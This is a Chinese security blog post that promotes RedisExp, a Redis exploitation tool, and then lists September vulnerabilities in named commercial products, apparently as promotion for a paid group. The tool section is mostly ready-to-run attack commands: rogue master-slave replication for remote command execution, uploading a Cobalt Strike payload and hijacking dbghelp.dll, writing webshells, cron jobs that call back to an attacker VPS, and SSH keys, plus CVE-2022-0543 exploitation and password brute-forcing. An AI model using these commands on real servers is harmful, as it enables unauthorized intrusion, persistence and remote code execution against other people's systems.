一款Redis综合漏洞利用工具|漏洞探测|9月漏洞汇总

0x01 工具介绍

RedisExp 是一个用于利用 Redis 漏洞的多功能工具，支持执行 Redis 命令、主从复制、DLL/SO 加载、文件上传、计划任务写入、SSH 公钥配置等操作。该工具允许用户通过不同的模块实现远程命令执行、上传恶意文件以及劫持 DLL。它适用于研究 Redis 安全漏洞，仅供合法的安全研究使用，不承担非法用途的责任。

下载地址在末尾

0x02 功能简介

功能

exp.dll 和 exp.so 已经把内容分别加载到 dll.go 和 so.go 可以直接调用。
在写入webshell的时候因为有一些特殊字符，可以使用把webshell进行 base64 编码，然后使用 -b 参数来解码
有空格的目录或文件同时使用双引号和单引号 "'a b'"
关闭Redis压缩(写入乱码的时候可以关闭压缩，工具在写入shell的时候默认添加了关闭压缩，写入后再恢复开启压缩)

config set rdbcompression no

stop-writes-on-bgsave-error 默认为 yes, 如果 Redis 开启了 RDB 持久化并且最后一次失败了，Redis 默认会停止写入，让用户意识到数据的持久化没有正常工作。临时的解决方案是 conf set stop-writes-on-bgsave-error 设置为 no，只是让程序暂时忽略了这个问题，但是数据的持久化的问题并没有。（工具会默认设置为 no ，等工具退出的时候再重新设置回原来的值yes）

config set stop-writes-on-bgsave-error no

dll 劫持

利用dbghelp.dll：

上传 cs 马.RedisEXP.exe -m upload -r 127.0.0.1 -p 6378 -w 123456 -L 127.0.0.1 -P 2222 -rp c:userspublic -rf test.exe  -lf artifact.exe上传 dbghelp.dll 到 redis-server.exe 所在目录进行劫持.RedisEXP.exe -m upload -r 127.0.0.1 -p 6378 -w 123456 -L 127.0.0.1 -P 2222 -rp . -rf dbghelp.dll  -lf dbghelp.dll触发dll劫持.RedisEXP.exe -m bgsave -r 127.0.0.1 -p 6378 -w 123456

生成gohper

RedisExp.exe -m gopher -r 目标IP -p 目标端口 -f gopher模板文件

写shell模板

config set dir /tmpconfig set dbfilename shell.phpset 'webshell' '<?php phpinfo();?>'bgsave

报错

工具报错：[ERR Error loading the extension. Please check the server logs.]        module load /tmp/exp.so服务端报错：Module /tmp/exp.so failed to load: It does not have execute permissions.

有可能是 Redis 版本太高， exp.so 没有执行权限导致加载不了。具体需要查看服务端的报错

0x03更新说明

load 加载dll 或 so 执行命令cli 执行redis命令功能

0x04 使用介绍

详细命令使用：-h 查看

██████╗ ███████╗██████╗ ██╗███████╗    ███████╗██╗  ██╗██████╗██╔══██╗██╔════╝██╔══██╗██║██╔════╝    ██╔════╝╚██╗██╔╝██╔══██╗██████╔╝█████╗  ██║  ██║██║███████╗    █████╗   ╚███╔╝ ██████╔╝██╔══██╗██╔══╝  ██║  ██║██║╚════██║    ██╔══╝   ██╔██╗ ██╔═══╝██║  ██║███████╗██████╔╝██║███████║    ███████╗██╔╝ ██╗██║╚═╝  ╚═╝╚══════╝╚═════╝ ╚═╝╚══════╝    ╚══════╝╚═╝  ╚═╝╚═╝基本连接: RedisExp.exe -r 192.168.19.1 -p 6379 -w 123456执行Redis命令：RedisExp.exe -m cli -r 192.168.19.1 -p 6379 -w 123456 -c info加载dll或so执行命令：RedisExp.exe -m load -r 目标IP -p 目标端口 -w 密码 -rf (目标 dll | so 文件名)RedisEXP.exe -m load -r 127.0.0.1 -p 6379 -rf exp.dll -n system -t system.exec主从复制命令执行：RedisExp.exe -m rce -r 目标IP -p 目标端口 -w 密码 -L 本地IP -P 本地Port [-c whoami 单次执行] -rf 目标文件名[exp.dll | exp.so (Linux)]RedisEXP.exe -m rce -r 127.0.0.1 -p 6379 -L 127.0.0.1 -P 2222 -c whoamiRedisEXP.exe -m rce -r 127.0.0.1 -p 6379 -L 127.0.0.1 -P 2222 -c whoami -rf exp.so主从复制上传文件：RedisExp.exe -m upload -r 目标IP -p 目标端口 -w 密码 -L 本地IP -P 本地Port -rp 目标路径 -rf 目标文件名 -lf 本地文件RedisEXP.exe -m upload -r 127.0.0.1 -p 6379 -L 127.0.0.1 -P 2222 -rp . -rf 1.txt -lf .README.md主动关闭主从复制：RedisExp.exe -m close -r 目标IP -p 目标端口 -w 密码写计划任务：RedisExp.exe -m cron -r 目标IP -p 目标端口 -w 密码 -L VpsIP -P VpsPortRedisEXP.exe -m cron -r 192.168.1.8 -p 6379 -L 192.168.1.8 -P 9001写SSH 公钥：RedisExp.exe -m ssh -r 目标IP -p 目标端口 -w 密码 -u 用户名 -s 公钥RedisEXP.exe -m ssh -r 192.168.1.8 -p 6379 -u root -s ssh-aaaaaaaaaaaaaa写webshell：RedisExp.exe -m shell -r 目标IP -p 目标端口 -w 密码 -rp 目标路径 -rf 目标文件名 -s Webshell内容 [base64内容使用 -b 来解码]RedisEXP.exe -m shell -r 127.0.0.1 -p 6379 -rp . -rf shell.txt -s MTIzNA== -bCVE-2022-0543：RedisExp.exe -m cve -r 目标IP -p 目标端口 -w 密码 -c 执行命令爆破Redis密码：RedisExp.exe -m brute -r 目标IP -p 目标端口 -f 密码字典RedisEXP.exe -m brute -r 127.0.0.1 -p 6378 -f pass.txt生成gohper：RedisExp.exe -m gopher -r 目标IP -p 目标端口 -f gopher模板文件执行 bgsave：RedisExp.exe -m bgsave -r 目标IP -p 目标端口 -w 密码判断文件（需要绝对路径）：RedisExp.exe -m dir -r 目标IP -p 目标端口 -w 密码 -rf c:windowswin.ini

0x05 内部星球9月新增漏洞

Ymnetsnet框架 upload文件上传漏洞H3C CVM upload前台任意文件上传漏洞H3C CVM fileUploadfd前台任意文件上传漏洞Nacos未授权下载配置信息漏洞网御VPN安全网关存在任意文件下载漏洞(CNVD-2024-34014)用友U8CRM系统接口relobjreportlistphp存在SQL注入漏洞资产管理运营系统ticket存在SQL注入漏洞万能小程序运营管理系统 _requestPost接口任意文件读取漏洞thinkphp最新CVE-2024-44902反序列化漏洞宏景fieldsettree 接口存在SQL注入漏洞天融信运维安全审计系统synRequest存在远程命令执行漏洞泛微-ecology loginsso sql注入漏洞AC集中管理平台未授权漏洞王道4S管理系统GetKuCunInfo存在SQL注入漏洞九块九付费进群系统 wxselect SQL注入漏洞商混ERP系统 TaskCarToQueueaspx SQL注入漏洞地大信息-基础信息平台 GetImg 任意文件读取漏洞雍熙cms index 任意文件读取漏洞智慧平台PersonalDayInOutSchoolData存在SQL注入漏洞cmseasy index 信息泄露漏洞泛微OA前台sql注入获取管理员密码漏洞魅思-视频管理系统 getOrderStatus SQL注入漏洞誉龙视音频综合管理平台 ThirdTimeSyn 远程命令执行漏洞誉龙视音频综合管理平台 RelMediaFindById SQL注入漏洞泛微-移动管理平台 win 任意文件读取漏洞广联达 WriteAllBytes 任意文件上传漏洞深大智能科技有限公司管控平台服务端Download存在任意文件读取漏洞唯徳知识产权管理系统 UploadFileWordTemplate 文件上传致RCE漏洞Array Networks APV应用交付系统 RCE漏洞商混ERP系统 operater-action sql注入方正全媒体采编系统 syn 信息泄露漏洞EKing-管理易 Base64Upload存在任意文件上传漏洞C-MOR 视频监控存在任意文件读取漏洞武汉地大信息工程股份有限公司基础信息平台GetImg存在任意文件读取漏洞哲霖机械M9ERP DownloadInpFile 任意文件读取漏洞章管家list 接口存在SQL注入漏洞VIEWGOOD-getUser-sql注入漏洞Jenkins-Remoting任意文件读取漏洞(CVE-2024-43044)用友U8-Cloud多个接口SQL注入漏洞WordPress插件GiveWP存在反序列漏洞(CVE-2024-5932)华望云会议管理平台多处存在SQL注入漏洞百易云资产管理运营系统 housesavephp SQL注入漏洞北京朗新天霁sTalent人力资源系统-GetTokey信息泄露漏洞NUUO摄像头存在命令执行漏洞深大智能科技有限公司管控平台服务端UploadFile存在任意文件上传漏洞灵当CRM客户管理系统 index sql注入漏洞Hoverfly simulation 任意文件读取漏洞复现(CVE-2024-45388)唯徳知识产权产权系统DownloadFileWordTemplate存在任意文件读取漏洞顺景ERP管理系统UploadInvtSpFile任意文件上传漏洞Crocus devicestate sql注入漏洞金和OA jc6 DownLoadBgImage接口存在文件读取漏洞NUUO摄像头存在任意文件读取漏洞用友U8 CRM chkServicephp SQL注入漏洞SuperMap-iServer login 远程命令执行漏洞灵当CRM客户管理系统multipleupload 任意文件上传漏洞九思OA officeserver接口sql注入漏洞热网无线监测系统GetMenuItem存在SQL注入漏洞灵当CRM客户管理系统auth-info 信息泄露漏洞Oracle JDEdwards EnterpriseOne Tools未授权获取管理员密码漏洞smanga get-file-flow 文件读取漏洞用友时空-KSOA com-sksoft-common-portal XXE漏洞泛微-ecology ModeDateService sql注入漏洞Kedacom-Phoenix-监控平台 upload-fcgi 任意文件上传泛微-移动管理平台 get 信息泄露锐明Crocus系统存在敏感信息泄漏漏洞万户ezOFFICE协同管理平台filesendcheck_gd存在SQL注入漏洞用友-U8C-Cloud com-ufida-web-action sql注入山东思达特测控设备有限公司热网无线监测系统GetDataKindByType存在SQL注入漏洞浪潮云财务系统UploadListFileashx存在任意文件上传漏洞东胜物流软件SubCompSeaeDefAdapterSQL注入漏洞金和OA jc6 oaplusrangedownloadfile接口存在文件读取漏洞多企源基础数据支撑系统checkLoginaction存在SQL注入漏洞短剧影视小程序多个漏洞EOVA未授权doInit接口存在反序列化漏洞紫光电子档案管理系统selectFileRemote存在SQL注入漏洞CVE-2024-21413-Microsoft Outlook远程代码执行漏洞蜂信物联(FastBee) 物联网平台 任意文件下载漏洞用友NC Cloud show_download_content接口权限绕过存在SQL注入漏洞Ivanti Virtual Traffic Manager存在身份验证绕过漏洞（CVE-2024-7593）某仿soul欲音社交系统存在任意文件读取漏洞众诚网上订单系统o_sa_orderashx存在SQL注入漏洞